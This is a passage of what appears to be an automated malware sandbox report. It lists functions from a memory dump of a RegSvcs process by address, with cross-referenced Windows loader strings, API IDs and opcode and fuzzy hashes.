                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014E20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 014E2104
                                                                                                                              • LdrpInitializationFailure, xrefs: 014E20FA
                                                                                                                              • Process initialization failed with status 0x%08lx, xrefs: 014E20F3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                              • API String ID: 0-2986994758
                                                                                                                              • Opcode ID: 595dd4ea8d828d5a957c3ac1c2ae731c50f346239938ff254ed2491459d461d9
                                                                                                                              • Instruction ID: 77dfc639eb61840be742957b160625ee45ffba843e8fcb319dd6c174f9300d9b
                                                                                                                              • Opcode Fuzzy Hash: 595dd4ea8d828d5a957c3ac1c2ae731c50f346239938ff254ed2491459d461d9
                                                                                                                              • Instruction Fuzzy Hash: 19F02834A403097BF720D60DDC16F9A7BACEB50B85F11001FF6047B3A1D2F0A640CA41
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014703E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: #%u
                                                                                                                              • API String ID: 48624451-232158463
                                                                                                                              • Opcode ID: 51d0aff29c08f0d56c1849191495afd21fbc592e6049dfba7c4ad0ff02c42bd8
                                                                                                                              • Instruction ID: 3483a51973657cc275b1deec4301fd9380cf80aca7550ef2505466378a0c0017
                                                                                                                              • Opcode Fuzzy Hash: 51d0aff29c08f0d56c1849191495afd21fbc592e6049dfba7c4ad0ff02c42bd8
                                                                                                                              • Instruction Fuzzy Hash: 1D712C71A0014A9FDB01DFA9D994FAEB7F8BF18704F15406AE905E7261EB34ED01CBA1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0146A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • LdrResSearchResource Enter, xrefs: 0146AA13
                                                                                                                              • LdrResSearchResource Exit, xrefs: 0146AA25
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                              • API String ID: 0-4066393604
                                                                                                                              • Opcode ID: 26ca7037869637cf579b52a70da960c5d38e8cc1532e24bf983b3fb03c3037e1
                                                                                                                              • Instruction ID: 8aa5ee668ca447103fd2661209d498735ff0f869af5c1a050283e3f279e95652
                                                                                                                              • Opcode Fuzzy Hash: 26ca7037869637cf579b52a70da960c5d38e8cc1532e24bf983b3fb03c3037e1
                                                                                                                              • Instruction Fuzzy Hash: 9DE19275A006099FEF21CF99C940BAEBBB9FF54718F20442BEA01E7361D7749941CB51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0152A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: `$`
                                                                                                                              • API String ID: 0-197956300
                                                                                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                              • Instruction ID: dadb004db33c60d77cc1e718a873d0540623437edae0ea202135fddb3de6c473
                                                                                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                              • Instruction Fuzzy Hash: B4C1BF322043529BEB25CF28C840B6BBBE5BFD5318F084A2DF6968B6D0D774E505CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014DE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID: Legacy$UEFI
                                                                                                                              • API String ID: 2994545307-634100481
                                                                                                                              • Opcode ID: 2d8097c051b6dca387dec3bf018b003346f1bb848576889840f83636ab6db809
                                                                                                                              • Instruction ID: c0e6dc9e2745c44c3aafe2b7fd5b0feddb4d63a9d8d216aab8411bd792ed35c9
                                                                                                                              • Opcode Fuzzy Hash: 2d8097c051b6dca387dec3bf018b003346f1bb848576889840f83636ab6db809
                                                                                                                              • Instruction Fuzzy Hash: 1E617D71E002099FDF24DFA9C951BAEBBB9FB54700F64402EE649EB2A1D731E901CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 015043D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @$MUI
                                                                                                                              • API String ID: 0-17815947
                                                                                                                              • Opcode ID: f63e35693f8aa99945f8190b20a0958ace63c2de6c54c88a37f4936034f7c083
                                                                                                                              • Instruction ID: 7639de1552f6ecd6dd7fc3b109e5f1b8448360182d6b4f263878171b70cf9416
                                                                                                                              • Opcode Fuzzy Hash: f63e35693f8aa99945f8190b20a0958ace63c2de6c54c88a37f4936034f7c083
                                                                                                                              • Instruction Fuzzy Hash: D8510971D0021DAFDB11DFE9CC90EEEBBB8BB54654F11052AE611BB290D671AA058B60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014604E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • kLsE, xrefs: 01460540
                                                                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0146063D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                              • API String ID: 0-2547482624
                                                                                                                              • Opcode ID: afb3d875157bab27febb66f4496c5c741b20847755f420d5938f732c714e5b28
                                                                                                                              • Instruction ID: b0e8746100652d5d7c167b14454df6cead2b63e50485dabcf3512d8baacb23bd
                                                                                                                              • Opcode Fuzzy Hash: afb3d875157bab27febb66f4496c5c741b20847755f420d5938f732c714e5b28
                                                                                                                              • Instruction Fuzzy Hash: 2A51D1715007428FD724DF29C4406A7BBE8AF84308F10483FF6AA87361E774D945CB92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0146A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0146A309
                                                                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0146A2FB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                              • API String ID: 0-2876891731
                                                                                                                              • Opcode ID: 947e8007cc9534dd7074e6423c9767e9846d5d6216457de46b443d08b0b33ee4
                                                                                                                              • Instruction ID: f17155aaa4b424ca781dc94e961675479e782cc4ef88dc79af3841f3761cf093
                                                                                                                              • Opcode Fuzzy Hash: 947e8007cc9534dd7074e6423c9767e9846d5d6216457de46b443d08b0b33ee4
                                                                                                                              • Instruction Fuzzy Hash: 6B41AF34A04A55DBDB11CF59C440B6A7BB8FF95704F24406BE900EB371E3B5D981CB52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0149A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID: Cleanup Group$Threadpool!
                                                                                                                              • API String ID: 2994545307-4008356553
                                                                                                                              • Opcode ID: 0b3a2cefa74130a47733ec5dce465691c141eb688d751ed0471e2d8525d2a930
                                                                                                                              • Instruction ID: 597e75829df632e95419b4e7a4fac3e87af95118614bf9122d593ffb07bf1d64
                                                                                                                              • Opcode Fuzzy Hash: 0b3a2cefa74130a47733ec5dce465691c141eb688d751ed0471e2d8525d2a930
                                                                                                                              • Instruction Fuzzy Hash: F101D1B2240744AFD311DF14CD45F267BE8EB94716F05893AA69CCB1A0E374D804DB86
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0146C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: MUI
                                                                                                                              • API String ID: 0-1339004836
                                                                                                                              • Opcode ID: 2d76c5c85b5521b2c8a582d4df26ba17749b7503b45dd7df1b0bc6bbfc62b6a6
                                                                                                                              • Instruction ID: 04aab5fcb8fd760ac8dad565e3bfb2f913fc36305bbfeafcaf1c07351ce3f000
                                                                                                                              • Opcode Fuzzy Hash: 2d76c5c85b5521b2c8a582d4df26ba17749b7503b45dd7df1b0bc6bbfc62b6a6
                                                                                                                              • Instruction Fuzzy Hash: 3D826075E002189FDB24CFA9C8807EEBBB9BF44718F14816BD999AB361D7309D41CB51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0150A118 Relevance: 1.8, Strings: 1, Instructions: 591COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: @
                                                                                                                              • API String ID: 0-2766056989
                                                                                                                              • Opcode ID: c3e9316bdf52a3a090416a67958ef52682cc3ff45329d00e778c5fcc845f3444
                                                                                                                              • Instruction ID: 283599494fb4c4bd37863e3baf69bb824f3b7952a2091bc39cbec1a7b82ac315
                                                                                                                              • Opcode Fuzzy Hash: c3e9316bdf52a3a090416a67958ef52682cc3ff45329d00e778c5fcc845f3444
                                                                                                                              • Instruction Fuzzy Hash: 5A22CF746047618BEB26CFADC49077ABBF1BF44340F08895AD9868F2C6E375E452CB60
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014E6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 0-3916222277
                                                                                                                              • Opcode ID: 33b29249e6e50529dfcbb19f8e61f5d228e37635fb679a8af56c9615683900f4
                                                                                                                              • Instruction ID: b460ac0af2cf079c97604f364c06a9d7c7cab4569714994f06d891188aeb942f
                                                                                                                              • Opcode Fuzzy Hash: 33b29249e6e50529dfcbb19f8e61f5d228e37635fb679a8af56c9615683900f4
                                                                                                                              • Instruction Fuzzy Hash: A7916571A40219AFEB21EF95DD45FAE7BB8EF24B50F11405AF604AB2A0D775ED00CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0150E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 0-3916222277
                                                                                                                              • Opcode ID: c0ad0813d43c49dca99c1c3e6f5e2f96de880ee36ded1862d27d31110819ff4f
                                                                                                                              • Instruction ID: 475365ac0a197a63f1037c2fc472bb456c5ffb117faeabcf3b97d26c50495ad5
                                                                                                                              • Opcode Fuzzy Hash: c0ad0813d43c49dca99c1c3e6f5e2f96de880ee36ded1862d27d31110819ff4f
                                                                                                                              • Instruction Fuzzy Hash: BA919E72901206AEDB23AFE5DC45FEFBBB9FF55740F24081AE505AB2A0D774A901CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0149A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: GlobalTags
                                                                                                                              • API String ID: 0-1106856819
                                                                                                                              • Opcode ID: a8b924a73c236b6070628a3df3e39c4dafd7d4b6f62b64bbe788c2c35d499646
                                                                                                                              • Instruction ID: 71b083e9f3a10eb49ae5dc4ebb404a8bfbc6bb622f5a728fe5a2e09a9291246d
                                                                                                                              • Opcode Fuzzy Hash: a8b924a73c236b6070628a3df3e39c4dafd7d4b6f62b64bbe788c2c35d499646
                                                                                                                              • Instruction Fuzzy Hash: 41717F75E0120A8FDF28DF9DC5A16AEBBB1BF98710F15812FE905AB361E7309941CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01504978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .mui
                                                                                                                              • API String ID: 0-1199573805
                                                                                                                              • Opcode ID: 23e067384936e244394c35327cba77450ccc63bdac7f9d521a6e50161d44b167
                                                                                                                              • Instruction ID: 18c5476bb52baa21e527b986901e8f124aa12a967ed2d314d3cd41099db45012
                                                                                                                              • Opcode Fuzzy Hash: 23e067384936e244394c35327cba77450ccc63bdac7f9d521a6e50161d44b167
                                                                                                                              • Instruction Fuzzy Hash: 5451A572D0022A9BDF16DFD9D840AAEBBB5BF18714F05412AEA11BF290D3749C01CBE4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0147E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: EXT-
                                                                                                                              • API String ID: 0-1948896318
                                                                                                                              • Opcode ID: cee5e9e58d18a06186865a76fee0a63ea6af412262f0e1b8059869396b0b8f25
                                                                                                                              • Instruction ID: ffaa2a130fbc3ef51c7d15d501fc0498861f0c941a116f6e4d3f5eb16b080a8c
                                                                                                                              • Opcode Fuzzy Hash: cee5e9e58d18a06186865a76fee0a63ea6af412262f0e1b8059869396b0b8f25
                                                                                                                              • Instruction Fuzzy Hash: 3C41B3725083429BD710DB7AC940BABF7E8AF98714F440A6FF684E7260E674D905C793
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014DC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: BinaryHash
                                                                                                                              • API String ID: 0-2202222882
                                                                                                                              • Opcode ID: 70b81e4cbf7bc00cc294a6219351c6bf2478ba01c89e2c35220d2f46572c348e
                                                                                                                              • Instruction ID: 420e17c6fe2c0a7d8a04498461fbd99ff8ea790bb9aa2edcadae5525d62a3829
                                                                                                                              • Opcode Fuzzy Hash: 70b81e4cbf7bc00cc294a6219351c6bf2478ba01c89e2c35220d2f46572c348e
                                                                                                                              • Instruction Fuzzy Hash: 8B4175B1D0012DABDF21DA50CC95FDEB77CAB54714F0145AAE708AB150DB709E89CFA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014E07C3 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: ym.
                                                                                                                              • API String ID: 0-3011085838
                                                                                                                              • Opcode ID: 7d08698392fabf97d93f9fe6e0d475ec14b97111f7142f2c04bccbac8571f8d1
                                                                                                                              • Instruction ID: c6b81c919224ca4d6b4bc6d98adec3ba52b09f71d9a5551f30f3213956bbf9d5
                                                                                                                              • Opcode Fuzzy Hash: 7d08698392fabf97d93f9fe6e0d475ec14b97111f7142f2c04bccbac8571f8d1
                                                                                                                              • Instruction Fuzzy Hash: 1741AEB16083419BD320DF29C845B9BBBE8FF98614F014A2FF5A8D7261D7709904CB92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014F6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: #
                                                                                                                              • API String ID: 0-1885708031
                                                                                                                              • Opcode ID: e036b7913a3030a2f92fb117fe5127ae06b487aae1eaf70d90e3df53b72eb1af
                                                                                                                              • Instruction ID: 50f7215869fd16de41205cb903bfa3edb43af442dcb234efaf8f409e3b256a1e
                                                                                                                              • Opcode Fuzzy Hash: e036b7913a3030a2f92fb117fe5127ae06b487aae1eaf70d90e3df53b72eb1af
                                                                                                                              • Instruction Fuzzy Hash: 9A312831A003599AEB32CB69C850BEF7BA8DF15304F56402EEA80AB3A2C775DC05CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014DCA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: BinaryName
                                                                                                                              • API String ID: 0-215506332
                                                                                                                              • Opcode ID: 819c055c5b45a47ac8dcee2cb6e82e4cb6699cf6cd137f10e07c85e0cb7c96b2
                                                                                                                              • Instruction ID: 7e9b0564f0400ca58655ce6fa857c763a4b91c15105f40c2158b6a53a8ead9b5
                                                                                                                              • Opcode Fuzzy Hash: 819c055c5b45a47ac8dcee2cb6e82e4cb6699cf6cd137f10e07c85e0cb7c96b2
                                                                                                                              • Instruction Fuzzy Hash: 9831E376900515AFEF16DB59D8A5E7FBB74EB90720F01412EE905AB260D730DE04EBE0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014E892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 014E895E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                              • API String ID: 0-702105204
                                                                                                                              • Opcode ID: edd072c2e3155247994180438e31216d0bf6889bd8b637e9cd803789112e875e
                                                                                                                              • Instruction ID: 6515cdb15ec159b7c8d7515c3414d0915d31e9412f475f15e5bc9d352331c86a
                                                                                                                              • Opcode Fuzzy Hash: edd072c2e3155247994180438e31216d0bf6889bd8b637e9cd803789112e875e
                                                                                                                              • Instruction Fuzzy Hash: D501F7326103029BEB365B56D89CA5B7BE5FF91295B04042FFA811B271CB30B845D793
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01502000 Relevance: .8, Instructions: 757COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a8266bbfe8a112d55679c1822543cc8664f52aa130bf1abf8af96360674d04d1
                                                                                                                              • Instruction ID: 4f610f36a8a745978243eda9fffd2940e6e864db6703e1f6b866546d2a1100e3
                                                                                                                              • Opcode Fuzzy Hash: a8266bbfe8a112d55679c1822543cc8664f52aa130bf1abf8af96360674d04d1
                                                                                                                              • Instruction Fuzzy Hash: A34208356083019FD726CFA9C894A6FBBE5BF94300F08492EFA868F290D771D945CB52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 014F8158 Relevance: .6, Instructions: 617COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2e055a5557fc405e8145403a4aa9bb1dc9ff90aff45082d78eec363beaf14c64
                                                                                                                              • Instruction ID: 76709896bdb911627e39246d6254d7ed4ee744eeeb94bb5bd0e078d26ed36f72
                                                                                                                              • Opcode Fuzzy Hash: 2e055a5557fc405e8145403a4aa9bb1dc9ff90aff45082d78eec363beaf14c64
                                                                                                                              • Instruction Fuzzy Hash: 82424D75A0021A8FEB24CF69C841BAEBBF5BF58300F15819EEA49EB351D7349985CF50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01472840 Relevance: .6, Instructions: 605COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3f5bb522c664e6824ce54a590ed00275caaea493d8e5c8686ba8315d929224ba
                                                                                                                              • Instruction ID: 8c29edad6540f211d82504b684af4eb47142ee16b4a33f5a6fb2fa27f0c54d5c
                                                                                                                              • Opcode Fuzzy Hash: 3f5bb522c664e6824ce54a590ed00275caaea493d8e5c8686ba8315d929224ba
                                                                                                                              • Instruction Fuzzy Hash: 0A321378A007558BDB65CF69C844BBFBBF2BF84B00F25811ED44A9B3A4D735A802CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 01466A50 Relevance: .5, Instructions: 548COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d3659e9974801899d34d844dc87a27c467989828aab4aa109f817c6aba6016f9
